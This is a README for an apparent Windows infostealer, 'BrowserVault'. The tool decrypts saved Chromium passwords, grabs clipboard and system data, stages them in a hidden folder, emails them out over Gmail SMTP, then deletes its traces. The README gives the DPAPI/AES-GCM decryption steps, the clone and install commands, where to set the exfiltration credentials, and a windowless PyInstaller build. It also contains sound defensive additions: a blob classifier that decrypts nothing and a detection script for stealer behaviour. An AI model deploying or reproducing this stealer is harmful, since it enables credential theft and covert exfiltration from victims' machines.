A post-exploitation simulation tool that demonstrates how browser-stored credentials, clipboard contents, and system fingerprints can be harvested and exfiltrated from a compromised Windows endpoint. Built for red team labs, malware research, and security awareness training.
⚠️ Authorized use only. Only run against systems you own or have explicit written permission to audit. Unauthorized use is illegal.
Simulates the credential harvesting phase of a post-exploitation attack — the kind that follows an initial foothold via phishing or local access. Extracts data silently, stages it in a hidden directory, exfiltrates via SMTP, then self-cleans.
```text
[*] Starting credential audit...
[+] Chrome ✓ 12 credentials extracted
[+] Edge ✓ 8 credentials extracted
[+] Brave ✓ 3 credentials extracted
[+] Opera / GX ✓ 1 credential extracted
[+] Clipboard ✓ Contents captured
[+] System info ✓ OS, hostname, network fingerprint collected
[*] Staging to hidden directory...
[*] Exfiltrating via SMTP...
[*] Cleaning up local traces...
[+] Done.
```
| Component | Implementation |
|---|---|
| Credential extraction | DPAPI decryption via win32crypt + AES-GCM (pycryptodome) |
| Target browsers | Chrome, Edge, Brave, Opera, Opera GX |
| System fingerprint | Hostname, OS version, local IP via socket + platform |
| Clipboard capture | pyperclip |
| Staging | Hidden folder (SysDataHidden) in user profile |
| Exfiltration | Gmail SMTP with App Password auth |
| Cleanup | os.remove() post-send |
Chromium-based browsers on Windows protect saved passwords with DPAPI, plus an AES-256-GCM layer added in Chrome 80. The process:
- Read the base64-encoded `encrypted_key` from the profile's `Local State` file (`os_crypt.encrypted_key`)
- Strip the leading `DPAPI` marker and decrypt the remaining blob with `CryptUnprotectData` to recover the AES key
- For each `password_value` in the `logins` table of the `Login Data` SQLite DB, strip the `v10` prefix, take the 12-byte nonce that follows, and AES-GCM decrypt the rest (the final 16 bytes are the GCM tag)
`Login Data` is held open by the browser while it runs, so tools typically work from a copy. Newer Chrome releases (127 and later) add App-Bound Encryption, whose values carry a `v20` prefix and whose key is bound to the browser's elevation service; a user-context `CryptUnprotectData` call alone no longer recovers those.
This is exactly what the browser itself does every time it autofills a login: the key is protected only by the user's logon secret, so any code running in that user's session can perform the same decryption. That is why local access to an unlocked session is so dangerous.
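The on-disk layout described above, parsed without any decryption, as an added example that is not part of BrowserVault: it pulls the DPAPI blob out of a constructed `Local State`, classifies each `password_value` in a constructed `Login Data` copy by its prefix (`v10`, `v20`, or a raw DPAPI blob), and splits a `v10` value into nonce, ciphertext and tag. The constructed database keeps three of the real `logins` table's columns, the filler bytes after each prefix are not real ciphertext, and no key is ever unwrapped; this is the triage a responder runs on a seized profile to learn which scheme is in play.

```python
import base64
import json
import os
import sqlite3
import tempfile

# Header of a raw Windows DPAPI blob: version 1, then the provider GUID
# df9d8cd0-1501-11d1-8c7a-00c04fc297eb in the byte order CryptProtectData emits.
DPAPI_BLOB_MAGIC = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")
V10_PREFIX, V20_PREFIX = b"v10", b"v20"
NONCE_LEN, TAG_LEN = 12, 16


def local_state_key_blob(local_state_json: str) -> bytes:
    """Return the DPAPI blob that wraps the AES key in a Local State document.

    Chromium stores base64("DPAPI" + CryptProtectData(key)) at os_crypt.encrypted_key.
    The result is what CryptUnprotectData would consume; nothing is decrypted here.
    """
    raw = base64.b64decode(json.loads(local_state_json)["os_crypt"]["encrypted_key"])
    if not raw.startswith(b"DPAPI"):
        raise ValueError("encrypted_key lacks the DPAPI prefix")
    blob = raw[len(b"DPAPI"):]
    if not blob.startswith(DPAPI_BLOB_MAGIC):
        raise ValueError("value after the prefix is not a DPAPI blob")
    return blob


def classify_blob(blob: bytes) -> str:
    """Name the scheme protecting one password_value."""
    if blob.startswith(V10_PREFIX):
        return "v10-aesgcm"    # Chrome 80+: AES-256-GCM under the Local State key
    if blob.startswith(V20_PREFIX):
        return "v20-appbound"  # Chrome 127+ App-Bound Encryption; user-context DPAPI alone is not enough
    if blob.startswith(DPAPI_BLOB_MAGIC):
        return "dpapi-legacy"  # pre-80: CryptProtectData applied straight to the password
    return "unknown"


def split_v10(blob: bytes):
    """Split a v10 value into (nonce, ciphertext, tag); no decryption."""
    if not blob.startswith(V10_PREFIX) or len(blob) < len(V10_PREFIX) + NONCE_LEN + TAG_LEN:
        raise ValueError("not a well-formed v10 value")
    body = blob[len(V10_PREFIX):]
    return body[:NONCE_LEN], body[NONCE_LEN:-TAG_LEN], body[-TAG_LEN:]


def audit_login_data(db_path: str) -> dict:
    """Count saved logins per scheme. Run it on a copy: the live file is locked by the browser."""
    counts = {}
    conn = sqlite3.connect(db_path)
    try:
        for _url, _user, pw in conn.execute(
                "SELECT origin_url, username_value, password_value FROM logins"):
            scheme = classify_blob(bytes(pw))
            counts[scheme] = counts.get(scheme, 0) + 1
    finally:
        conn.close()
    return counts


# Constructed sample values (assumptions). Bytes after each prefix are filler, not real ciphertext.
SAMPLE_V10 = V10_PREFIX + bytes(range(NONCE_LEN)) + b"\xaa" * 20 + b"\xbb" * TAG_LEN
SAMPLE_V20 = V20_PREFIX + bytes(range(NONCE_LEN)) + b"\xcc" * 20 + b"\xdd" * TAG_LEN
SAMPLE_LEGACY = DPAPI_BLOB_MAGIC + b"\x00" * 40
SAMPLE_LOCAL_STATE = json.dumps({"os_crypt": {
    "encrypted_key": base64.b64encode(b"DPAPI" + DPAPI_BLOB_MAGIC + b"\x11" * 32).decode()}})


def build_sample_db(path: str) -> None:
    """Constructed Login Data holding three of the real logins table's many columns."""
    conn = sqlite3.connect(path)
    conn.execute("CREATE TABLE logins (origin_url TEXT, username_value TEXT, password_value BLOB)")
    conn.executemany("INSERT INTO logins VALUES (?, ?, ?)", [
        ("https://example.com/login", "alice", SAMPLE_V10),
        ("https://intranet.example/", "alice", SAMPLE_V10),
        ("https://mail.example.org/", "alice", SAMPLE_V20),
        ("https://old.example.net/", "alice", SAMPLE_LEGACY),
    ])
    conn.commit()
    conn.close()


def demo_audit() -> dict:
    """Build the constructed DB in a temp dir and audit it."""
    path = os.path.join(tempfile.mkdtemp(), "Login Data")
    build_sample_db(path)
    return audit_login_data(path)


if __name__ == "__main__":
    print(demo_audit())  # {'v10-aesgcm': 2, 'v20-appbound': 1, 'dpapi-legacy': 1}
    nonce, ct, tag = split_v10(SAMPLE_V10)
    print(len(local_state_key_blob(SAMPLE_LOCAL_STATE)), len(nonce), len(ct), len(tag))
```

A `v20` count above zero tells you a user-context DPAPI decrypt would not have been enough on that host, which changes both what the red team report can claim and what the blue team should expect in telemetry.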
```bash
git clone https://github.com/Dawn-Fighter/BrowserVault.git
cd BrowserVault
pip install pyperclip pycryptodome pypiwin32
```
(`pypiwin32` is an old shim; `pywin32` is the maintained package that provides `win32crypt`.)

Edit the top of `info.py`:
```python
SENDER_EMAIL = "sender@gmail.com"
APP_PASSWORD = "xxxx xxxx xxxx xxxx"  # Gmail App Password, not your login password
RECIPIENT_EMAIL = "receiver@gmail.com"
```

```bash
# Run audit
python info.py

# Build as a silent (no console window) executable for lab deployment testing
pip install pyinstaller
pyinstaller --onefile --windowed info.py
# Output in dist/
```
A `loot.dat` file is generated containing extracted credentials, system info, and clipboard contents. It is emailed to `RECIPIENT_EMAIL` and then deleted from disk. To inspect it manually before sending, comment out the cleanup line in `info.py`.
This tool gets caught by:
- EDR behavioral analysis: `CryptUnprotectData` called from a process that is not a browser (or another known DPAPI consumer) is a common alert rule
- File access monitoring: the browser holds `Login Data` open while it runs, so a direct read fails or has to be retried and tools typically copy the file first; either way, a non-browser process touching `Login Data` or `Local State` is visible in file-access telemetry
- SMTP from non-mail clients: an outbound connection to port 465/587 from an arbitrary user process stands out to network DLP and egress monitoring
- AV heuristics: `CryptUnprotectData` plus outbound SMTP in the same process is a strong signal
Defensive takeaways for blue teams:
- Browser-stored credentials are trivially extractable on any compromised endpoint
- Unlocked user sessions are high-value targets: enforce screen lock and session timeouts
- DPAPI protection is only as strong as the user's logon secret; anyone who can run code as that user, or who holds the user's password or the domain DPAPI backup key, can decrypt
- Deploy EDR rules alerting on `Login Data` / `Local State` access by non-browser processes, and correlate with outbound SMTP from the same process
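Detection logic for the signals listed under "gets caught by" and the EDR rule in the last bullet, as an added example that is not part of BrowserVault: it replays constructed Sysmon-style file-read and network-connect events, flags non-browser reads of `Login Data`/`Local State` and SMTP connections from non-mail processes, and raises severity when both come from the same PID. The allowlists, event field names and sample events are assumptions; the `CryptUnprotectData` call itself is not covered, because that needs API-level or ETW telemetry rather than file and network logs.

```python
import re
from collections import defaultdict

# Constructed allowlists (assumptions); tune them per fleet.
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe"}
MAIL_CLIENT_IMAGES = {"outlook.exe", "thunderbird.exe"}
SMTP_PORTS = {25, 465, 587}

# Files under a Chromium profile that hold the wrapped key or the encrypted credentials.
CREDENTIAL_STORE_RE = re.compile(
    r"\\user data\\(.*\\)?(local state|login data|web data|cookies)$", re.IGNORECASE)


def is_credential_store(path: str) -> bool:
    """True for a Chromium 'Local State' or 'Login Data' style file inside a User Data dir."""
    return CREDENTIAL_STORE_RE.search(path.replace("/", "\\")) is not None


def image_name(image: str) -> str:
    """Lower-cased executable name from a full image path."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Correlate file and network events per PID and return findings.

    Each event is a dict (constructed, loosely Sysmon-shaped):
      type "file_read":   pid, image, target
      type "net_connect": pid, image, dst_host, dst_port
    """
    per_pid = defaultdict(lambda: {"image": None, "stores": [], "smtp": []})
    for ev in events:
        rec = per_pid[ev["pid"]]
        rec["image"] = image_name(ev["image"])
        if ev["type"] == "file_read" and is_credential_store(ev["target"]):
            if rec["image"] not in BROWSER_IMAGES:
                rec["stores"].append(ev["target"])
        elif ev["type"] == "net_connect" and ev["dst_port"] in SMTP_PORTS:
            if rec["image"] not in MAIL_CLIENT_IMAGES:
                rec["smtp"].append(f'{ev["dst_host"]}:{ev["dst_port"]}')

    findings = []
    for pid, rec in per_pid.items():
        reasons = []
        if rec["stores"]:
            reasons.append("non-browser read of credential store: " + "; ".join(rec["stores"]))
        if rec["smtp"]:
            reasons.append("SMTP from non-mail client: " + ", ".join(rec["smtp"]))
        if not reasons:
            continue
        # Either signal alone is noisy; both from one process is the stealer pattern.
        if rec["stores"] and rec["smtp"]:
            severity = "critical"
        elif rec["stores"]:
            severity = "high"
        else:
            severity = "medium"
        findings.append({"pid": pid, "image": rec["image"], "severity": severity, "reasons": reasons})
    return findings


# Constructed sample telemetry: one browser, one stealer-like process, one mail client, one odd backup job.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "type": "file_read",
     "target": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"pid": 5588, "image": r"C:\Users\alice\Downloads\info.exe", "type": "file_read",
     "target": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Local State"},
    {"pid": 5588, "image": r"C:\Users\alice\Downloads\info.exe", "type": "file_read",
     "target": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"pid": 5588, "image": r"C:\Users\alice\Downloads\info.exe", "type": "net_connect",
     "dst_host": "smtp.gmail.com", "dst_port": 587},
    {"pid": 3001, "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", "type": "net_connect",
     "dst_host": "smtp.office365.com", "dst_port": 587},
    {"pid": 7777, "image": r"C:\Tools\backup.exe", "type": "net_connect",
     "dst_host": "mail.example.com", "dst_port": 465},
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding["severity"].upper(), finding["pid"], finding["image"])
        for reason in finding["reasons"]:
            print("   ", reason)
```

The browser's own read and Outlook's SMTP session produce nothing; `info.exe` is scored critical because the credential-store read and the SMTP connection share a PID, and `backup.exe` is left at medium for a follow-up rather than an alert.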
Built for post-exploitation research, red team simulations, and security awareness training. Only deploy in isolated lab environments on systems you own or have written authorization to test. Delete all output files after use. The author assumes no responsibility for misuse.
Chethas Dileep — Penetration Tester & Security Developer